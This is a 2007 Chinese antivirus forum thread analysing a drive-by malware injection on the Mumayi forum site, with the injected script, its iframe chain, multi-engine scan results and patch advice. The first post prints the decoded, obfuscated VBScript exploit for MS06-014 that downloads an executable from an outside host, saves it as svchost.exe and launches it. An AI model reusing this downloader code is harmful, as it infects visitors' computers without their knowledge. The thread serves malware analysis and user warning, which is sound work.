搜索
查看: 5496|回复: 35
收起左侧

木蚂蚁论坛又被挂马了,ms06-014的网马和一类viking物体

[复制链接]
dikex
发表于 2007-3-25 19:30:10 | 显示全部楼层 |阅读模式
这次的马在主页(bbs.mumayi.net)上面,源代码被加上了这样一句
  1. <script id="advjs" src="http://web.77276.com/adv.js?showmatrix_num=056"></script>
复制代码


根据上面链接的showmatrix_num=056和adv.js中的内容:
  1. document.write("<iframe src="http://web.77276.com/1/"+u_num+".htm" width="0" height="0" frameborder="0"></iframe>");
复制代码

可以知道这个会调用http://web.77276.com/1/056.htm这个网页

而这个056.htm有在跳转多一次,跳转到了http://web.77276.com/0.htm,打开源文件一看,N多三位数字,明显就是ASCII码了,转换他们后狐狸终于露出尾巴了,看看它吧:

  1. on error resume next
  2. tc = "http://do.77276.com/0.exe"
  3. fname1="svchost.exe"
  4. fname2="svchost.vbs"
  5. Set df = document.createElement("o"&"b"&"j"&"e"&"c"&"t")
  6. df.setAttribute "c"&"l"&"a"&"s"&"s"&"i"&"d", "c"&"l"&"s"&"id:"&"BD96C5"&"56"&"-65"&"A3"&"-11"&"D0"&"-98"&"3A"&"-00"&"C04"&"FC2"&"9E"&"36"
  7. str="Mic"&"ro"&"so"&"ft."&"X"&"M"&"L"&"HT"&"TP"
  8. str5="A"&"d"&"o"&"d"&"b."&"S"&"tr"&"e"&"am"
  9. Set x = df.CreateObject(str,"")
  10. set S = df.createobject(str5,"")
  11. S.type = 1
  12. str6="G"&"E"&"T"
  13. x.Open str6, tc, False
  14. x.Send
  15. set F = df.createobject("Scripting.FileSystemObject","")
  16. set tmp = F.GetSpecialFolder(2)  
  17. fname1= F.BuildPath(tmp,fname1)
  18. S.open
  19. S.write x.responseBody
  20. S.savetofile fname1,2
  21. S.close
  22. fname2= F.BuildPath(tmp,fname2)
  23. set ts = F.OpenTextFile(fname2, 2, True)
  24. ts.WriteLine "Set Shell = CreateObject(""Sh""&""ell""&"".App""&""lic""&""at""&""ion"")"
  25. sql="Shell.ShellExecute"""+fname1+""","""","""",""o""&""p""&""e""&""n"",0"
  26. ts.writeLine sql
  27. ts.close
  28. if F.FileExists(fname1)=true then
  29. if F.FileExists(fname2)=true then
  30. set Q = df.createobject("She"&"ll."&"App"&"li"&"ca"&"tion","")
  31. dc="o"&"p"&"e"&"n"
  32. Q.ShellExecute fname2,"","",dc,0
  33. end if
  34. End if
复制代码
下载http://do.77276.com/0.exe到临时文件夹下面,名字为svchost.exe,并创建svchost.vbs来调用svchost.exe

下面是多引擎扫描对0.exe的扫描结果,可以看出结果不太一致,而且在虚拟机中运行是出错,故暂时无法说清楚是哪个病毒,但扫描结果倾向于viking的较多,估计为viking
AhnLab-V3 2007.3.24.1 03.24.2007 Win32/Viking.suspicious
AntiVir 7.3.1.44 03.23.2007 TR/Crypt.NSPM.Gen
Authentium 4.93.8 03.24.2007 Possibly a new variant of W32/PWStealer.gen1
Avast 4.7.936.0 03.23.2007 Win32:Tibs-ADO
AVG 7.5.0.447 03.24.2007  no virus found
BitDefender 7.2 03.25.2007 GenPack:Win32.Worm.Viking.IZ
CAT-QuickHeal 9.00 03.23.2007 (Suspicious) - DNAScan
ClamAV devel-20070312 03.25.2007  no virus found
DrWeb 4.33 03.25.2007 Win32.HLLW.Gavir.54
eSafe 7.0.14.0 03.22.2007 suspicious Trojan/Worm
eTrust-Vet 30.6.3506 03.23.2007 Win32/Looked.HN
Ewido 4.0 03.24.2007  no virus found
FileAdvisor 1 03.25.2007  no virus found
Fortinet 2.85.0.0 03.25.2007 suspicious
F-Prot 4.3.1.45 03.23.2007 W32/PWStealer.gen1
F-Secure 6.70.13030.0 03.24.2007 Viking.gen
Ikarus T3.1.1.3 03.25.2007 Trojan-PWS.Win32.OnLineGames.id
Kaspersky 4.0.2.24 03.25.2007  no virus found
McAfee 4991 03.23.2007  no virus found
Microsoft 1.2306 03.25.2007  no virus found
NOD32v2 2143 03.25.2007 Win32/Pacex.Gen
Norman 5.80.02 03.23.2007 Viking.gen
Panda 9.0.0.4 03.24.2007 Suspicious file
Prevx1 V2 03.25.2007 Trojan.SystemPoser
Sophos 4.15.0 03.23.2007  no virus found
Sunbelt 2.2.907.0 03.24.2007  no virus found
Symantec 10 03.25.2007 W32.Looked.BK
TheHacker 6.1.6.080 03.23.2007  no virus found
UNA 1.83 03.16.2007  no virus found
VBA32 3.11.2 03.24.2007 Malw快举报我〓我违法了版规!cope.Worm.Viking.3
VirusBuster 4.3.7:9 03.24.2007 Packed/NSPM
Webwasher-Gateway 6.0.1 03.25.2007 Trojan.Crypt.NSPM.Gen


如果在临时文件夹下面发现了svchost.vbs和svchost.exe这两个文件,建议立刻进行查杀,并打上MS06-014漏洞补丁,http://www.microsoft.com/china/technet/security/bulletin/ms06-014.mspx


最后把样本都发上来,密码为virus

[ 本帖最后由 dikex 于 2007-3-25 19:55 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
The EQs
发表于 2007-3-25 19:37:04 | 显示全部楼层
Scan performed at: 2007-3-25 19:35:18
Scanning Log
NOD32 version 2143 (20070325) NT
Command line: C:\Documents and Settings\EQ2\桌面\桌面
Operating memory - is OK

Date: 25.3.2007  Time: 19:35:22
Anti-Stealth technology is enabled.
Scanned disks, folders and files: C:\Documents and Settings\EQ2\桌面\桌面\
C:\Documents and Settings\EQ2\桌面\桌面\0.exe - Win32/Pacex.Gen virus
Number of scanned files: 5
Number of threats found: 1
Number of files cleaned: 1
Time of completion: 19:35:22 Total scanning time: 0 sec (00:00:00)
小邪邪
发表于 2007-3-25 19:39:36 | 显示全部楼层
从扫描报告看是威金(已加壳),还有一个VBS脚本

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
The EQs
发表于 2007-3-25 19:40:01 | 显示全部楼层
AntiVir  Found TR/Crypt.NSPM.Gen, VBS/Dldr.Agent.6171  
ArcaVir  Found nothing
Avast  Found Win32:Tibs-ADO  
AVG Antivirus  Found nothing
BitDefender  Found GenPack:Win32.Worm.Viking.IZ, Trojan.Downloader.VBS.AD  
ClamAV  Found nothing
Dr.Web  Found Win32.HLLW.Gavir.54  
F-Prot Antivirus  Found Possibly a new variant of W32/PWStealer.gen1  
F-Secure Anti-Virus  Found nothing
Fortinet  Found VBS/Small.CT!tr.dldr  
Kaspersky Anti-Virus  Found nothing
NOD32  Found Win32/Pacex.Gen  
Norman Virus Control  Found nothing
Panda Antivirus  Found nothing
VirusBuster  Found Packed/NSPM, VBS.DR.Psyme.BZ  
VBA32  Found MalwareScope.Worm.Viking.3
The EQs
发表于 2007-3-25 19:44:20 | 显示全部楼层
报的最完整的是BD。。。。vb和XX有一个是XX。。。。
金剑
头像被屏蔽
发表于 2007-3-25 19:45:39 | 显示全部楼层
风暴胜者V2 测试版本(http://www.v0day.com)
______您的安全是我们的责任_______________

___________病毒查杀结果__________________
2007年3月25日19时45分39秒 开始查杀C:\Documents and Settings\Administrator\桌面\新建文件夹\新建文件夹
=========================================

_________文件性质分析结果________________
"带壳"仅指文件性质,仅供专业人员分析使用。


-----------------------------------------

2007年3月25日19时45分39秒收起线程…100% 查杀完毕!
扫描文件:1查杀病毒:0
solcroft
发表于 2007-3-25 19:46:17 | 显示全部楼层
我的电脑可以运行,活样本
楼主是强人一个,佩服一下,Javascript这一类的东西我总是搞不懂

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
马力
发表于 2007-3-25 19:57:04 | 显示全部楼层
驱逐舰全过
dikex
 楼主| 发表于 2007-3-25 19:59:59 | 显示全部楼层
原帖由 solcroft 于 2007-3-25 19:46 发表
我的电脑可以运行,活样本
楼主是强人一个,佩服一下,Javascript这一类的东西我总是搞不懂


其实对于Javascript我也不懂,但那些流行的网马(ms06-014等)来来去去都是那个样的,用iframe挂上去,利用某某漏洞下载并运行某个病毒,病毒文件一看就能看到,顶多是利用变量替换或者使用一些工具加密来达到免杀的效果,其实也就是那几个样子

[ 本帖最后由 dikex 于 2007-3-25 20:01 编辑 ]
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛|卡饭乐购| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 苏ICP备07004770号 ) GMT+8, 2019-9-19 19:05 , Processed in 0.049109 second(s), 5 queries , MemCache On.

快速回复 返回顶部 返回列表